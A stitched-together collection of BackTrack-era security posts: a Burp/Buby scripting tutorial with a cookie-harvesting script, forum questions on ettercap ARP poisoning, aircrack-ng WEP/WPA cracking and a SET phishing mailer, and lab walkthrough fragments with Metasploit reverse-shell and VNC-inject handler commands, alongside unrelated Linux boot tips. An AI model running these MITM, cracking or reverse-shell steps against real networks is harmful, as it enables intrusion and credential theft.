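    burp.do_passive_scan(rhost, rport, pre_bool, cached_req, msg)
    :passive
  end
end
```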

So let's cover each individually with a brief explanation and a code example. You can find sample scripts for each of these under the examples directory of the buby-script repo located Here.

EVT_HTTP_MESSAGE
---------------------------------

The following code will allow you to obtain methods exposed by the message_info object (which is a class):

The 3 separate objects that make up the param are:

tool_name => This is a string value, it is the name of the tool for which the message originated. Examples include proxy, scanner and repeater.

is_request => Boolean value (true/false), this returns true when it is a request and false when a response.

message_info => This is a class. It is an instance of the IHttpRequestResponse Java class. So there are methods such as get_comment, set_comment and getUrl exposed.

An example of using evt_http_message can be seen here (code):

....and the result: w00t!

So what does the code actually do?

Lines 1 and 2 - Define the method and separate param into 3 separate objects.
Line 3 - If the tool the message originated from was the spider and this is NOT a request, proceed to line 4.
Line 4 - If the response status code is 200 (OK), then move to line 5.
Line 5 - Puts "Yo, we received a 200 FTW!" to the console.
Lines 6-9 - Closing statements and passing the params back up to the superclass method.
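Since the code itself appears as an image, here is a hedged sketch reconstructing the handler the walkthrough describes (the status_code accessor on the stubbed message_info is an assumption for illustration, not the exact Buby call):

```ruby
# Spider responses with a 200 status trigger a console message.
def evt_http_message(tool_name, is_request, message_info)
  return unless tool_name == 'spider' && !is_request  # spider responses only
  return unless message_info.status_code == 200       # 200 OK

  puts 'Yo, we received a 200 FTW!'
  :alerted
end
```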

You can find another example using this method in the zlib_inflate.rb script.

EVT_SCAN_ISSUE
---------------------------

The following code will allow you to obtain methods exposed by the issue object (which is a class):

Only one object is exposed; it is a class called issue. Some of the methods exposed by this class are:

Lines 1-2 - Define the method (prnt) and separate objs into two objects (strn, meth).
Lines 3-4 - Define a string instance variable (str), then put the strn object into it.
Lines 6-10 - We take the meth object, which is an Array, iterate thru each item in it, and convert each to a string while calling the four methods it exposes (request_headers, request_body, response_headers, and response_body). These methods all belong to http_messages, and itm really represents the http_messages class. So when we iterate thru this array, we are really iterating thru an array containing a bunch of http_messages classes. Hopefully that makes sense.

Line 1 - Defines the method ($burp.evt_scan_issue) and instantiates the "issue" object.

Lines 2-14 - Creates an Array called "meth_array" which consists of methods associated with the issue object instantiated on line 1.

Lines 16-18 - Iterate thru the meth_array we created on line 2, picking out each method, and then send the method name and the method itself to prnt.

Line 20 - The http_message method attached to the issue object isn't in the meth_array because it can't be called directly and converted to a string. This is because http_message is an array of classes, and each class has its own methods. So we made a special prnt method for it called hm_prnt.

Well, that is all for Part 3 of this series. Part 4 will cover some of the other methods listed in the first part of this post. If you have any feedback, please provide it so the series can be improved upon.

Happy Hacking,

Let's cover one of the most used methods (in my opinion/experience) exposed by Buby, called "evt_proxy_message". I'd like to cover some of the objects exposed by this method, and the best way to do that is to step through the cookie_snatch.rb script located Here.
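Before the line-by-line walkthrough, here is a condensed sketch of the script's core move: split a response into headers and body, pull out the Set-Cookie header, and append it to cookiez.txt. The sample response is illustrative:

```ruby
# Split on the blank line (headers from body), then grab the Set-Cookie line.
def snatch_cookie(message)
  headers = message.split("\r\n\r\n", 2)[0]   # spmsg[0] in the real script
  headers[/^Set-Cookie:.*$/]                  # mitem, or nil if absent
end

resp   = "HTTP/1.1 200 OK\r\nSet-Cookie: session=abc123\r\n\r\n<html></html>"
cookie = snatch_cookie(resp)
# "a" mode appends rather than overwrites, as in the real script.
File.open('cookiez.txt', 'a') { |f| f.puts(cookie) } if cookie
puts cookie
```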

On the second line you see that we convert *param into 12 separate objects. Here is a brief explanation of each:

msg_ref - This is the request/response number. It is nothing more than a tracking number.

is_req - This is a boolean value; it returns true if it is a request, else false.

rhost - This is your target's hostname ONLY. It does NOT include the prefix (http/s), rport (80/443), or path (/directory/something.php).

rport - This is the remote port value (80/443/etc).

is_https - Returns true when https and false when http.

http_meth - This is the method (GET/POST/etc).

url - This is the path portion of a URL, not the full URL itself. Example: if the target was http://www.target.com/mydir/test.aspx then url would be /mydir/test.aspx.

resourceType - The filetype of the requested resource, or nil if the resource has no filetype.

status - The HTTP status code returned by the server. This value is nil for request messages.

req_content_type - String value, the content-type header returned by the server (nil for requests).

message - String value, the entire message, regardless of request/response; contains headers and body.

action - There are 4 types of actions:
ACTION_FOLLOW_RULES (0, this is the default)
ACTION_DO_INTERCEPT (1, direction to intercept a msg)
ACTION_DONT_INTERCEPT (2, don't intercept the msg)
ACTION_DROP (3, drops the in/outbound msg)

Example of using action (folks seem to have some confusion at times regarding this):

if rhost == "www.example.com"
  action[0] = 2
end

The above code logic is: if the rhost value is www.example.com, then don't intercept. The full code can be found in dont_intercept.rb in the Buby-Scripts repo.

Back to the code:

Lines 3-5
Line 3 assigns cookiez.txt to 'file'.
Line 4 evaluates the boolean value behind is_https.
If it is true, then prefix = https://; if false, http://.
Line 5 creates a rurl object which is a string concatenation of prefix, rhost and rport.

Lines 6-9
Line 6 evaluates whether is_req equals false (meaning it is a response). Unless it is a response, the code following it won't be run.
Line 7: spmsg (split message) is the message string split on two newlines. This separates the headers from the body. Array item 0 of spmsg (spmsg[0]) is going to be the headers and spmsg[1] will be the body.
Line 8: short_msg is assigned spmsg[0], converted to a string.
Line 9 assigns mitem the Set-Cookie portion of the response header.

Lines 10-12
Line 10 uses the in_scope? method, which takes the full URL. This is the reason for creating the rurl object on line 5. If the response is from a site that is in scope, we evaluate the next 2 lines of code.
Line 11: if mitem (the Set-Cookie key/value) isn't nil, then we evaluate line 12.
Line 12 opens the file (created on line 3, cookiez.txt) and writes to it. Because we have passed "a" instead of "w", the cookies will be appended rather than overwritten.

The rest of the code terminates the "if" statements and sends the params up to the superclass's version of evt_proxy_message. This super(*params) can be nice when you'd like to modify data prior to its arrival at Burp.

Okay, well, hopefully this was a good start for those interested in extending Burp's capabilities. Part 3 in this series will cover other useful methods exposed by Buby.

~Happy Hacking

cktricky

I am having the same problem as the person in a post in the "wireless" area (thread name: Low #/s) - that is, a problem with gathering enough packets.

I'm on a brand new Dell Studio 1555 (core i5, 4GB RAM) with an Intel wireless card with an Intel 4965/5xxx chipset (according to airmon-ng). From what I've heard, the card only recently got its driver added to the kernel, but it works fine with bt4 out of the box. I've run injection tests, and they have worked fine.

I then start collecting packets, and find that I have a really low rate, and really low power (generally around -30) so I try to do packet injection. I get the "Association successful :-)" notification and plenty of ARP requests, and it says that I'm sending out loads of packets.

The rate of collection, however, remains completely unchanged.

I then go back to test injection, and it no longer works.

In other words, it's completely identical to the problem that the person in the thread I mentioned above has.

I've been evaluating ettercap's features on my LAN, and now I've got a problem that I just can't solve. After 2 days of trying to find out what's going on, I finally gave up. So here I am, asking for a few words of clarification. :) Maybe I've missed something. Heh.

My main distro is not BT but Debian squeeze. I would try ettercap's forum for this issue, but it seems to be dead. As I believe it's not directly Debian-related, this is the place with people knowledgeable enough on the subject. Hope that's not a problem (and that this is the right forum for it).

I'm running ettercap NG-0.7.3 in Debian squeeze, kernel 2.6.33-amd64.

So, here we go: ettercap's built-in dissectors don't work at all, as ettercap seems to receive corrupt/malformed packets from the network. The SSL dissector, which uses iptables for redirection, does work though. Strangely enough, if I fire up wireshark and start capturing, I can see the packets correctly (and a lot of out-of-order or duplicated ACKs, which I believe is normal... sort of). Since I used official packages from the Debian repo, I tried to compile ettercap myself with --enable-debug to see if there were any clues in its logs about what's going on. Unfortunately, no. The dissectors never fire (except for SSL), and there are no relevant log entries.

I booted BT4 Final to give it a try. To my surprise, it does work! ettercap sees all packets correctly and the dissectors work perfectly. Even dissector-dependent plugins (for URL sniffing), like remote_browser, work.

Tried the same ettercap parameters with 2 different wifi cards: an Intel 4965AGN and an external RTL8187L. Same results: Debian = corrupt packets, BT = 100%. Here is the command line I've used in the tests:
Code:
ettercap -Tq -M arp:remote -i wlan0 /192.168.1.1/ /192.168.1.7/ (.1 = GW / .7 = Target)
Here is a sample packet dump from both distros, with target visiting yahoo (trimmed the log, just the initial packets are enough, as the same behavior occurs in the other packets):

Sat Apr 3 00:42:50 2010
TCP 200.152.168.178:80 --> 192.168.1.7:40942 | A
As you can see, in Debian the packets are likely incomplete or have some "offset", so neither the dissectors nor the plugins can correctly parse useful data from them. ARP poisoning is working perfectly, as shown by chk_poison and wireshark.
The first DNS resolution packets (UDP) seem to be OK in both distros, but not the TCP ones.

I have no idea where to look now. Maybe something is trashing the packets before they arrive at ettercap.

If someone has one (or many) ideas to share, I'll be very grateful. :) If more info is needed, please tell me and I'll promptly reply.

Commands: http://pastebin.com/2Eq1zG88

What is this?
This is my walkthrough of how I broke into pWnOS v1.
pWnOS is a "VM image" that creates a target on which to practice penetration testing, with the "end goal" of getting root. It was designed for practicing exploits, with multiple entry points.

Scenario
A company dedicated to webhosting hires you to perform a penetration test on one of its servers dedicated to the administration of their systems.
It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t. :)

Notes:
I had problems with the Debian OpenSSH/OpenSSL exploit; sometimes it would work, other times it would be really slow or just couldn't find the correct exploit file. The method I use turns it into an offline attack, which makes it stealthier as it will not log failed logins (e.g. /var/log/auth.log; see here for reading it). It relies on the default path though!

This is one method of getting in; the author did say that there are multiple ways in!

It also took me a bit of work to get it working with VirtualBox and static IP addresses.
Read my post here (short answer: you need to configure another interface via another OS).

So I am just trying to get into one of the APs I have set up around my house that is set to WEP. I am following the tutorial on the Aircrack-ng wiki and everything goes fine until I get to the fake authentication. At that point I enter everything they say, including my normal hardware's MAC address, and I get output like this:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
and it repeats; then after a while it tells me the attack has failed. I have tried from different distances, across the house and right in front of the router, but no go.

I looked for a bit on Google and found a post here that talked about MAC filtering, so I checked my router and it isn't enabled. Still, I took my netbook, connected it to the AP to get its MAC address, changed my computer's MAC to that address, turned the netbook off and tried to authenticate, but again I get the same output and a failed attack.

hello all
i am trying to get remote access to my main computer on my network using the SET email attack.
however, when i open the pdf i do not get command-line access!
see below:
thanks in advance for the advice
yoma

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

There are two options on the mass e-mailer, the first would
be to send an email to one indivdual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

#set payload windows/shell_bind_tcp ##Could do a windows shell (not as powerful as meterpreter)
#set payload windows/meterpreter/reverse_tcp ##Could do a meterpreter (but we do it later!)
set payload windows/vncinject/bind_tcp
show options
set lhost 10.0.0.6
show options
exploit

##Start fresh for the backdoor!
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.6
exploit

## Somehow run: C:\g0tmi1k\g0tmi1k.exe

Notes:
Made a few slip-ups in the video and something went wrong with keylogrecorder.
This is only the basic stuff - it can do a lot more! See the commands for a few more basic things which I didn't do.

What is this?
This is my walkthrough of how I broke into the De-ICE.net network, level 2, disk 1.
The De-ICE.net network is on a "live PenTest CD" that creates target(s) on which to practise penetration testing; it has an "end goal" to reach.

What is this?
This is my walkthrough of how I broke into the De-ICE.net network, level 1, disk 2.
The De-ICE.net network is on a "live PenTest CD" that creates target(s) on which to practise penetration testing; it has an "end goal" to reach.

What is this?
This is my walkthrough of how I broke into the De-ICE.net network, level 1, disk 1.
The De-ICE.net network is on a "live PenTest CD" that creates target(s) on which to practise penetration testing; it has an "end goal" to reach.

I am relatively new to these forums, and somewhat new to Backtrack.
I was wondering if somebody on here could help me with my Partition Table. I was trying to re-arrange it and make it neater and cleaner.

But somehow Partition Magic in Vista told me it was all messed up and asked if I wanted it fixed. So, as an eager little beaver who wasn't thinking, I hit the "Sure, why not" button. =/
Bad mistake.
At first Windows wouldn't boot; it recognized my custom boot screen, then hit a blue screen and cycled. Come to find out my partition table got screwed up even more, so I fixed it from having two boot flags and duplicate entries, along with writing a new MBR and fixing the MFT, down to this.

As far as I can see, my main problem is that sda2 ends on cylinder 1315 and sda3 is set to start on cylinder 1315.
I was wondering if my problem is bigger than this, or if it's as simple as changing that value with sfdisk or testdisk.

I've tried testdisk and that won't do anything, and sfdisk is too complicated for me to just start throwing values into.

ANY help is sooooo much appreciated.
I'll give you any printout you need.
PLEASE HELP ME, I've been up for two days trying to fix this.
& I'm STUCK!

First, is there any reason why bt4 doesn't come with the current version of airpwn? Are there stability problems with the new driver? I am fine with the old version, but just wanted to give it a try!

So, I guess after the removal of the old version, my first question is: can I work with the installed version of lorcon 171-bt0?

In the case of no: I removed it and tried to compile from source, but I was stopped after configure by
Code:
configure: error: *** Missing working Linux wireless kernel extensions ***
In the case of yes: I started compiling airpwn 1.4; configure seemed fine, but then I got hit by this:

Hi all. I was trying to crack security on some routers. I tried to crack WEP, and I did it. Also WPA/WPA2, and I cracked it (because the password was in the dictionary, as we all know).

But the question is: there is a router with WEP security whose channel is 123, and when I start monitor mode on its channel and start airodump again, I see that its channel has changed to another.


When I was trying to scan my network, I needed some help with the following hosts, which were taking too much time:

Code:
msf > db_nmap -v -PN 11.68.2.*

Starting Nmap 4.60 at 2010-01-29 13:54 GMT
Initiating Parallel DNS resolution of 43 hosts. at 13:54
Completed Parallel DNS resolution of 43 hosts. at 13:54, 16.50s elapsed
Initiating SYN Stealth Scan at 13:54
Scanning 5 hosts [1715 ports/host]
Increasing send delay for 11.68.2.0 from 0 to 5 due to 11 out of 21 dropped probes since last increase.
Increasing send delay for 11.68.2.3 from 0 to 5 due to 11 out of 24 dropped probes since last increase.
SYN Stealth Scan Timing: About 1.47% done; ETC: 14:28 (0:33:47 remaining)
adjust_timeouts2: packet supposedly had rtt of 9534065 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8570036 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8570036 microseconds. Ignoring time.
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Increasing send delay for 11.68.2.1 from 0 to 5 due to 11 out of 16 dropped probes since last increase.
Increasing send delay for 11.68.2.1 from 5 to 10 due to max_successful_tryno increase to 4
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
adjust_timeouts2: packet supposedly had rtt of 8651528 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8651528 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8799413 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8799413 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9439597 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9439597 microseconds. Ignoring time.
Increasing send delay for 11.68.2.1 from 10 to 20 due to max_successful_tryno increase to 5
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
adjust_timeouts2: packet supposedly had rtt of 8456311 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8456311 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8075286 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8075286 microseconds. Ignoring time.
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
adjust_timeouts2: packet supposedly had rtt of 10434435 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 10434435 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9118916 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9118916 microseconds. Ignoring time.
Increasing send delay for 11.68.2.1 from 20 to 40 due to max_successful_tryno increase to 6
Increasing send delay for 11.68.2.1 from 40 to 80 due to max_successful_tryno increase to 7
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Quote:

Well, as I said, I was scanning my internal network; I never scan that IP (I changed my internal IP while posting here). And I made a mistake posting in Bug Fixes rather than a different section, because I had been trying to post some bugs in this section before.


I wanted to use BT4 basically as a live CD that I can boot from my HDD and run from RAM, with persistent changes. I extracted the ISO and copied it to its own partition, and everything has worked great except for the persistence. I can't really figure out why this isn't working out of the box; maybe it's a grub2 error. I've been researching persistence and grub2, and I'll post what I come up with, but I'd appreciate help if anyone can see what I'm doing wrong.
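For comparison, a grub2-style menuentry along these lines is one common way to request casper persistence on Ubuntu-based live systems (BT4 is Ubuntu-based). Everything here is a placeholder sketch under that assumption; the partition number, the kernel and initrd paths, and even whether BT4's initrd honours the `persistent` option should be checked against the actual extracted ISO:

```text
menuentry "BT4 (persistent)" {
    # placeholder: the partition holding the extracted ISO contents
    set root=(hd0,2)
    # 'boot=casper persistent' asks casper to look for a casper-rw
    # partition (or casper-rw file) and store changes there
    linux /boot/vmlinuz boot=casper persistent
    initrd /boot/initrd.gz
}
```

The persistence store itself is typically an ext3 partition or loopback file labelled casper-rw.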

I'm facing a problem implementing regular-expression filters in ettercap. My starting point was IronGeek's post "Fun with Ettercap Filters". That is quite a nice fun filter, and it works fine in my lab...

}
But the filter does not work... :mad:
As far as I can see in the log, ettercap says that this works fine:
Code:
replace("Accept-Encoding", "Accept-Rubbish!");
but
Code:
pcre_regex(DATA.data, "/i/g(<img.*[^>]src=['|\"])(.*[^'\"])(['|\"])", "$1tmp_image.png$3")
is just not found :confused:
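One way to sanity-check what that pcre_regex pattern is meant to do is to try an equivalent substitution outside ettercap. This is only a sketch of the intended img-src rewrite, not ettercap's own engine; the sample HTML line is made up, and the sed character classes drop the stray `|` inside the original bracket expressions (in PCRE, `['|\"]` matches a literal pipe as well as quotes, which is probably not what was intended):

```shell
# Rough sed equivalent of the intended rewrite: replace the src URL of
# an <img> tag with tmp_image.png. The sample input is invented for testing.
html='<img class="logo" src="http://example.com/real.jpg">'
rewritten=$(printf '%s\n' "$html" \
  | sed -E "s|(<img[^>]*src=['\"])([^'\"]*)(['\"])|\1tmp_image.png\3|")
echo "$rewritten"
```

If the substitution behaves here but not in ettercap, the problem is more likely the filter's flag syntax or the traffic being gzip-encoded than the regex idea itself.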

OK so I was heading away on holidays and I wanted to keep my luggage to a minimum. I didn't want to bring my laptop with me, but I still wanted to have full access to all my files, my programs, my entire operating system.

So I figured hey, I can take the hard disk out of my laptop, stick it in a USB enclosure, and then just bring the hard disk around with me. The idea was I could take my hard disk, connect it to any computer, and then just boot off it.

Before I went away, my Grub entry for booting Linux was as follows:

Code:
title Main Linux OS
root (hd0,2)
kernel /boot/vmlinuz-2.6.31-17-generic root=/dev/sda3 ro quiet splash
initrd /boot/initrd.img-2.6.31-17-generic
quiet
So I went away on holidays and I hooked my hard disk up to a computer via USB and then booted off it. The Grub menu appeared, and I simply hit Enter to boot into Linux. It booted up fine and everything worked.

But with some computers, there were complications.

If you look at my Grub entry above, you'll see that it makes two references to the partition on which Linux resides:

Reference 1: (hd0,2)
Reference 2: /dev/sda3

The first reference never seems to cause any problems, reason being that "hd0" will always refer to the hard disk which Grub has just booted off (or at least that's how it seems).

The second reference however can cause problems. On some of the computers I used, the Grub menu appeared, I hit Enter, and then Linux failed to load. The problem was that my own hard disk was being given the designation of sdb instead of sda. I had a workaround for this. When the Grub menu appeared, I would press E to edit the entry, and I would change the following line:

Code:
kernel /boot/vmlinuz-2.6.31-17-generic root=/dev/sdb3 ro quiet splash
After I made that change, I pressed B to boot up Linux, and it booted up fine. (I didn't need to change root (hd0,2) to root (hd1,2)).

Here's what my fstab file looked like:

Code:
proc /proc proc defaults 0 0
/dev/sda3 / ext3 relatime,errors=remount-ro 0 1
As you can see, my Linux partition was referred to as "/dev/sda3" in my fstab file. Even on the computers where my hard disk was designated as sdb at boot-time, this fstab entry didn't cause any problems (you'd think I would have had to change it to sdb!). Even though my own Linux partition was designated as sdb3 at boot-time, it appears as though it was known as sda3 by the time it came to mounting the root filesystem. (Don't ask me, I haven't got a clue either).

I wanted to find the best way of making my Linux installation fully portable so that I could bring my hard disk around and boot it on different computers.

...and that's when I discovered UUIDs :cool:

UUIDs solve the problem of hard disks being given different designations on different systems (e.g. sda vs sdb vs sdc). Every Linux partition (e.g. ext2, ext3, ext4) has its own unique UUID. You can use this UUID to refer to the partition instead of using "/dev/sda3". To make use of UUIDs, I had to change two files on my hard disk: my Grub file and my fstab file. I changed them as follows.

Here's my Grub file:
Code:
title Main Linux OS
uuid 8c5055d5-75e5-5f57-9585-5a5525551524
kernel /boot/vmlinuz-2.6.31-17-generic root=UUID=8c5055d5-75e5-5f57-9585-5a5525551524 ro quiet splash
initrd /boot/initrd.img-2.6.31-17-generic
quiet
And here's my fstab:
Code:
proc /proc proc defaults 0 0
UUID=8c5055d5-75e5-5f57-9585-5a5525551524 / ext3 relatime,errors=remount-ro 0 1
After I made those changes, it booted every time on every computer. Notice, in these two files, that there's no reference to the hard disk number or even the partition number. You can move this Linux partition around however you like, you can change the partition order on your current hard disk, or you can move the Linux partition to a different hard disk. Your Linux installation should still boot right away without a problem because it's working off the UUID of the partition.

Anyway I thought this was pretty cool when I got it working right, and I just had to share it... this is the kind of stuff that makes me really love Linux :rolleyes:

If you want to find out the UUIDs of your partitions, do the following:
Code:
sudo blkid | sort
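As a small helper, the UUID can be pulled out of a blkid line with sed. The device path and UUID below are hard-coded samples so the snippet runs anywhere; in practice you would pipe real `sudo blkid` output through the same expression:

```shell
# Sample blkid-style line (made up); real usage: sudo blkid | sed -E ...
line='/dev/sda3: UUID="8c5055d5-75e5-5f57-9585-5a5525551524" TYPE="ext3"'
uuid=$(printf '%s\n' "$line" | sed -E 's/.*UUID="([^"]*)".*/\1/')
echo "$uuid"
```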
Also, another little cool thing I found is the "/dev/disk" folder. Navigate into that folder and take a look around!

My landlord has provided me with a password, and he and his friends are able to connect using their Windows computers. I captured a WPA handshake and added the password to a dictionary list, but aircrack-ng says the password isn't found. I showed him the password he wrote, but he insists it's correct.

Please help me; I only make a little money online and need the net to earn money for food, and I don't use Windows :(
